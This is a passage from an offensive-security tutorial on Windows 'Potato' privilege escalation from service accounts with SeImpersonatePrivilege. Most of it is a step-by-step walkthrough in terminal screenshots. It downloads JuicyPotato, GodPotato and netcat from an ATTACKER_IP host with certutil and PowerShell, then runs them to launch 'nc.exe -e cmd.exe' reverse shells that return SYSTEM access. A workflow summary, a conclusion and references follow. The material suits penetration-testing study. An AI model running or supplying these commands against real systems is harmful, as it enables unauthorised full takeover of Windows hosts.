│ C:\inetpub\wwwroot> certutil -urlcache -split -f │
│ http://ATTACKER_IP:8080/JuicyPotato.exe C:\Windows\Temp\jp.exe │
│ **** Online **** │
│ 0000 ... │
│ CertUtil: -URLCache command completed successfully. │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Alternative using PowerShell:
┌─────────────────────────────────────────────────────────────────────────────┐
│ Windows PowerShell _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ PS C:\inetpub\wwwroot> Invoke-WebRequest │
│ -Uri http://ATTACKER_IP:8080/JuicyPotato.exe │
│ -OutFile C:\Windows\Temp\jp.exe │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Also transfer nc.exe (netcat) for the reverse shell callback:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\inetpub\wwwroot> certutil -urlcache -split -f │
│ http://ATTACKER_IP:8080/nc.exe C:\Windows\Temp\nc.exe │
│ **** Online **** │
│ CertUtil: -URLCache command completed successfully. │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Step 5 — Scenario A: JuicyPotato on Server 2016
Attacker — start the listener:
┌─────────────────────────────────────────────────────────────────────────────┐
│ Terminal — attacker@kali _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ [attacker@kali ~]$ nc -lvnp 4444 │
│ listening on [any] 4444 ... │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Victim — execute JuicyPotato:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\Windows\Temp> jp.exe -l 1337 -p C:\Windows\Temp\nc.exe │
│ -a "-e cmd.exe ATTACKER_IP 4444" -t * │
│ -c {8BC3F05E-D86B-11D0-A075-00C04FB68820} │
│ Testing {8BC3F05E-D86B-11D0-A075-00C04FB68820} 1337 │
│ .... │
│ [+] authresult 0 │
│ {8BC3F05E-D86B-11D0-A075-00C04FB68820};NT AUTHORITY\SYSTEM │
│ [+] CreateProcessWithTokenW OK │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
If the CLSID does not work, try another one from the CLSID list for the target OS version.
Attacker — SYSTEM shell received:
┌─────────────────────────────────────────────────────────────────────────────┐
│ Terminal — attacker@kali _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ [attacker@kali ~]$ nc -lvnp 4444 │
│ listening on [any] 4444 ... │
│ connect to [ATTACKER_IP] from (UNKNOWN) [TARGET_IP] 49832 │
│ Microsoft Windows [Version 10.0.14393] │
│ (c) 2016 Microsoft Corporation. All rights reserved. │
│ │
│ C:\Windows\system32> whoami │
│ nt authority\system │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Step 5 — Scenario B: GodPotato on Server 2022
On modern Windows (Server 2019+), JuicyPotato no longer works. GodPotato is the go-to alternative.
Verify .NET Framework version (to choose the correct GodPotato binary):
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\inetpub\wwwroot> reg query "HKLM\SOFTWARE\Microsoft\NET Framework │
│ Setup\NDP" /s | findstr /i "version" │
│ │
│ Version REG_SZ 2.0.50727.4927 │
│ Version REG_SZ 3.5.30729.4926 │
│ Version REG_SZ 4.8.04084 │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
.NET 4.x available → use GodPotato-NET4.exe.
Transfer GodPotato (same method as Step 4):
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\inetpub\wwwroot> certutil -urlcache -split -f │
│ http://ATTACKER_IP:8080/GodPotato-NET4.exe C:\Windows\Temp\gp.exe │
│ **** Online **** │
│ CertUtil: -URLCache command completed successfully. │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Attacker — start the listener:
┌─────────────────────────────────────────────────────────────────────────────┐
│ Terminal — attacker@kali _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ [attacker@kali ~]$ nc -lvnp 4444 │
│ listening on [any] 4444 ... │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Victim — execute GodPotato:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\Windows\Temp> gp.exe -cmd "C:\Windows\Temp\nc.exe │
│ -e cmd.exe ATTACKER_IP 4444" │
│ [*] CombaseModule: 0x140000000 │
│ [*] DispatchTable: 0x140000000 │
│ [*] UseProtseqFunction: 0x140000000 │
│ [*] ImpsersonateClient: OK │
│ [*] Token: OK │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Attacker — SYSTEM shell received:
┌─────────────────────────────────────────────────────────────────────────────┐
│ Terminal — attacker@kali _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ [attacker@kali ~]$ nc -lvnp 4444 │
│ listening on [any] 4444 ... │
│ connect to [ATTACKER_IP] from (UNKNOWN) [TARGET_IP] 51204 │
│ Microsoft Windows [Version 10.0.20348] │
│ (c) Microsoft Corporation. All rights reserved. │
│ │
│ C:\Windows\system32> whoami │
│ nt authority\system │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Summary — Practical Workflow
┌─────────────────────────────────────────────────────────────────────────────┐
│ POTATO PRIVESC — PRACTICAL WORKFLOW │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ 1. whoami → Identify current user │
│ 2. whoami /priv → Check SeImpersonatePrivilege │
│ 3. systeminfo | findstr /B "OS" → Identify Windows version │
│ 4. wmic os get osarchitecture → Confirm x86 or x64 │
│ 5. Choose variant: │
│ ├─ Server <= 2016 → JuicyPotato │
│ ├─ Server 2019 (outbound ok) → RoguePotato │
│ ├─ Server 2019+ / 2022+ → GodPotato / SigmaPotato │
│ └─ Need fileless execution? → SigmaPotato │
│ 6. Transfer binary → certutil / PowerShell / SMB │
│ 7. Start listener → nc -lvnp PORT │
│ 8. Execute exploit → Receive SYSTEM shell │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Cheat Sheet
For a quick-reference command cheat sheet covering all Potato variants, CLSIDs, and one-liners for real-world engagements, check out:
Potato Privilege Escalation — Cheat Sheet
Conclusion
The Potato family represents one of the most persistent and evolving attack classes in Windows privilege escalation. Spanning a decade, these techniques exploit a fundamental design decision in Windows: granting service accounts the ability to impersonate authenticated clients.
Each variant reflects a specific moment in the arms race between researchers and Microsoft — from NBNS spoofing in 2016 to cross-session DCOM abuse in 2024. Understanding the entire family provides not just a toolkit for privilege escalation, but a deep understanding of Windows authentication internals, DCOM architecture, and the boundaries of Microsoft’s security model.
The key takeaway: if you compromise a service account with SeImpersonatePrivilege, there is almost certainly a Potato variant that will work — regardless of the Windows version or patch level.
References
[1] Microsoft, “Impersonation Levels (Authorization),” Microsoft Learn, 2024. Available: https://learn.microsoft.com/en-us/windows/win32/com/impersonation-levels
[2] Microsoft, “Privilege Constants (Authorization),” Microsoft Learn, 2024. Available: https://learn.microsoft.com/en-us/windows/win32/secauthz/privilege-constants
[3] Microsoft, “DCOM Technical Overview,” Microsoft Learn, 2024. Available: https://learn.microsoft.com/en-us/windows/win32/com/dcom-technical-overview
[4] Microsoft, “Named Pipes,” Microsoft Learn, 2024. Available: https://learn.microsoft.com/en-us/windows/win32/ipc/named-pipes
[5] S. Breen, “Hot Potato — Windows Privilege Escalation,” FoxGlove Security, Jan. 2016. Available: https://foxglovesecurity.com/2016/01/16/hot-potato/
[6] S. Breen and C. Mallz, “Rotten Potato — Privilege Escalation from Service Accounts to SYSTEM,” 2016. Available: https://github.com/breenmachine/RottenPotatoNG
[7] A. Pierini and G. Trotta, “Juicy Potato — Abuse SeImpersonate Privilege,” 2018. Available: https://github.com/ohpe/juicy-potato
[8] A. Pierini and A. Cocomazzi, “No more JuicyPotato? Old story, welcome RoguePotato!” Decoder’s Blog, May 2020. Available: https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/
[9] C. Coburn, “Sweet Potato,” GitHub, 2020. Available: https://github.com/CCob/SweetPotato
[10] BeichenDream, “GodPotato,” GitHub, 2022. Available: https://github.com/BeichenDream/GodPotato
[11] Prepouce and Hack0ura, “CoercedPotato,” GitHub, 2023. Available: https://github.com/Prepouce/CoercedPotato
[12] A. Pierini, “Hello: I’m your Domain Admin and I want to authenticate against you,” Decoder’s Blog, Apr. 2024. Available: https://decoder.cloud/2024/04/24/hello-im-your-domain-admin-and-i-want-to-authenticate-against-you/
[14] J. Lajara, “Potatoes — Windows Privilege Escalation,” Nov. 2020. Available: https://jlajara.gitlab.io/Potatoes_Windows_Privesc
[15] HideAndSec, “In the Potato Family, I Want Them All,” 2023. Available: https://hideandsec.sh/books/windows-sNL/page/in-the-potato-family-i-want-them-all
[16] Itm4n, “PrintSpoofer — Abusing Impersonation Privileges on Windows 10 and Server 2019,” May 2020. Available: https://github.com/itm4n/PrintSpoofer
[17] T. McCann, “SigmaPotato — GodPotato Fork with .NET Reflection, Built-in Reverse Shell, and AV Bypass,” GitHub, 2023. Available: https://github.com/tylerdotrar/SigmaPotato
[18] A. Cocomazzi and A. Pierini, “JuicyPotatoNG,” GitHub, 2022. Available: https://github.com/antonioCoco/JuicyPotatoNG
[19] M. Van Deusen, “GenericPotato,” GitHub, 2021. Available: https://github.com/micahvandeusen/GenericPotato